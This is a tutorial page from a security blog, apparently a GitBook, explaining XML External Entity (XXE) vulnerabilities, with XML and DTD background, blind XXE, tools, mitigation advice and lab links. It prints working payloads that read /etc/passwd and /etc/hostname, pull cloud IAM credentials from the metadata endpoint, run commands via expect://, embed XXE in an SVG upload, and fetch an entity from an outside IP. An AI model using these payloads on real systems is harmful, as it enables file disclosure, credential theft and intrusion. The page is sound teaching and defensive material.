📕
Blog
  • 🐞Vulnerabilities & Techniques
    • Web Vulnerabilities
      • Open Redirect
      • HTTP Parameter Pollution (HPP)
      • Host Header Injection (HHI)
      • XSS
      • HTML-Injection
      • clickjacking
      • S3
      • EXternal Xml Entity (XXE)
      • XSS prevention | CSP
      • DOM-XSS
      • SQL Injection | SQLI
      • Response Manipulation Technique & How Burp Suite Works
    • API Vulnerabilities
      • Mass Assignment Vulnerability
  • 🚩CTF
    • ASCWG
  • ✍️Writeups
    • Read Writeups
      • REST API WriteUps
      • Web Vulnerabilities WriteUps
    • Technical Writeups
      • Reset Password Poisoning Via Host Header Injection Lead to (ATO)
      • OTP/2FA Bypasses
        • OTP bypasses
  • 😈TryHackMe
    • THM Advent of Cyber 3 (2021) NoSQL WriteUp
  • 🔱Web-CyberTalents
    • CyberTalents-Web-Easy
    • CyberTalents-Web-Medium
    • CyberTalents-Web-Hard
  • 🖇️Pentesting & Bug Hunting Tips
    • ATO Via Host Header Injection
    • OTP Bypass
    • OutLook Plugin Pentest Guide
  • 💻Port-Swigger Labs
    • XML external entity (XXE) injection
    • DOM-XSS
      • DOM XSS in the document.write sink using source location.search
      • Lab: DOM XSS in document.write sink using source location.search inside a select element
      • Lab: DOM XSS in innerHTML sink using source location.search
      • Lab: DOM XSS in jQuery anchor href attribute sink using location.search source
      • Lab: Reflected DOM XSS
      • Lab: Stored DOM XSS
    • SQL injection
      • Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
      • Lab: SQL injection vulnerability allowing login bypass
      • Lab: SQL injection UNION attack, determining the number of columns returned by the query
      • Lab: SQL injection UNION attack, finding a column containing text
      • Lab: SQL injection UNION attack, retrieving data from other tables
      • Lab: SQL injection UNION attack, retrieving multiple values in a single column
      • Lab: SQL injection attack, querying the database type and version on Oracle
      • Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
      • Lab: SQL injection attack, listing the database contents on non-Oracle databases
  • 🛜Wireless Networks Penetration Testing
  • ⚔️Wi-Fi Attacks
    • 🕸️Network Scanning attack
    • 🌊DOS / Flooding
      • 1️⃣DoS - Frame Flooding (Deauth, EAPOL, Beacons)
      • 2️⃣DoS- Exploiting Countermeasures (MIC failure)
    • Jamming Attacks (هجمات التشويش)
    • Probe Requests Attack
    • Handshake Attacks
      • Dictionary Attack
      • Clientless Attack
      • KRACK Attack
      • Downgrad Attack
    • Rouge AP Attack
  • Lab Notes
  • RFID and NFC
  • Bluetooth
  • ZigBee
  • Google Map Test
Powered by GitBook
On this page
  1. Vulnerabilities & Techniques
  2. Web Vulnerabilities

EXternal Xml Entity (XXE)

PreviousS3NextXSS prevention | CSP

Last updated 1 year ago

External XML Entity (XXE)

Content

📚 What Is XXE ?

🤔 Why XXE Happen ?

🧬 XXE Types

⚔ Impact

🔎 How To Find

🛠 Tools

📕 Referance

🔬 Labs

📚 What Is XXE?

What is XML?

XML stands for “Extensible Markup Language”, It is the most common language for storing and transporting data. It is a self-descriptive language. It does not contain any predefined tags like <p>, <img>, etc. All the tags are user-defined depending upon the data it is representing for example. <email></email>, <message></message> etc.

You can know more about XML Entities FROM HERE To avoid wasting time.

Definition of XXE:

An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.

What is the Document Type Definition (DTD)?

It describes the structure of the document which contains elements and attributes declarations. The element declaration contains the allowable set of elements that will be used within the document. The attribute declaration contains the allowable set of attributes corresponding to each element.

Syntax: -

<!DOCTYPE element DTD identifier
[
 declaration1
 declaration2
 ........
]>

🤔 Why XXE Happen?

Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.

🧬 XXE Types

  1. Basic XXE

  2. Blind XXE

Blind XXE

Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. This means that direct retrieval of server-side files is not possible, and so blind XXE is generally harder to exploit than regular XXE vulnerabilities.

There are two broad ways in which you can find and exploit blind XXE vulnerabilities:

You can trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data. You can trigger XML parsing errors in such a way that the error messages contain sensitive data.

⚔ Impact

XML External Entity (XXE) can possess a severe threat to a company or a web developer. XXE has always been in the Top 10 list of OWASP. It is common for lots of websites to use XML in the string and transportation of data and if countermeasures are not taken then this information will be compromised. Various attacks that are possible are:

  • Server-Side Request Forgery (SSRF) 

<?xml version=”1.0” encoding=”UTF-8”?> 
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/admin”> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

  • Remote Code Execution (RCE)

<?xml version=”1.0” encoding=”ISO-8859-1”?>
<!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id” >]>
<stockCheck><productId>&xxe;</productId></stockCheck>

  • Read Files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

  • Cross-Site Scripting (XSS)

<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>

Content-Type: From JSON to XEE To change the request you could use a Burp Extension named Content Type Converter.

Here you can find this example:

Content-Type: application/json;charset=UTF-8

{"root": {"root": {
  "firstName": "Avinash",
  "lastName": "",
  "country": "United States",
  "city": "ddd",
  "postalCode": "ddd"
}}}
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]> 
<root>
 <root>
  <firstName>&xxe;</firstName>
  <lastName/>
  <country>United States</country>
  <city>ddd</city>
  <postalCode>ddd</postalCode>
 </root>
</root>

File Upload

XXE can be performed using the file upload method. We will be demonstrating this using Port Swigger lab “Exploiting XXE via Image Upload”. The payload that we will be using is:

<?XML version="1.0" standalone="yes"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/hostname"> ] >
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
    <text font-size="40" x="0" y="100">
        &xxe;
    </text>
</svg>

Understanding the payload: We will make an SVG file as only the upload area accepts only image files. The basic syntax of the SVG file is given above and in that, we have added a text field that will

We will be saving the above code as “payload.svg”. Now on portswigger, we will go on a post and comment and then add the made payload in the avatar field.

🔎 How To Find

Detect any XML data parsing or JSON and try to inject XXE

⚙ Mitigation

The best way to avoid XXE vulnerabilities is to

  • Altogether disable document type definitions (DTDs) in your XML parser.

  • If this is impossible, you must disable external entities and document type declarations for your parser.

  • disable support for XInclude

🛠 Tools

xxeftp: - A mini webserver with FTP support for XXE payloads

xxexploiter: - Tool to help exploit XXE vulnerabilities

230-OOB: - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via http://xxe.sh/

XXEinjector: - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods

oxml_xxe: - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)

docem: - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc

otori: - Toolbox intended to allow useful exploitation of XXE vulnerabilities.

📕 Reference

OWASP

PayloadsAllTheThings

hacktricks

hackingarticles

acunetix

Portswigger

Portswigger-Xml-Entities

Portswigger-Blind

XXE_Attack_Guide

🔬 Labs

  1. Portswigger Portswigger Labs Solution is Here

  2. OWASP Broken Web Applications Project: Install this Machine and will have a lot of Labs like DVWA, BWAPP, Webgoat, etc

🐞
  • External XML Entity (XXE)
  • 📚 What Is XXE?
  • What is XML?
  • Definition of XXE:
  • What is the Document Type Definition (DTD)?
  • 🤔 Why XXE Happen?
  • 🧬 XXE Types
  • ⚔ Impact
  • 🔎 How To Find
  • ⚙ Mitigation
  • 🛠 Tools
  • 📕 Reference
  • 🔬 Labs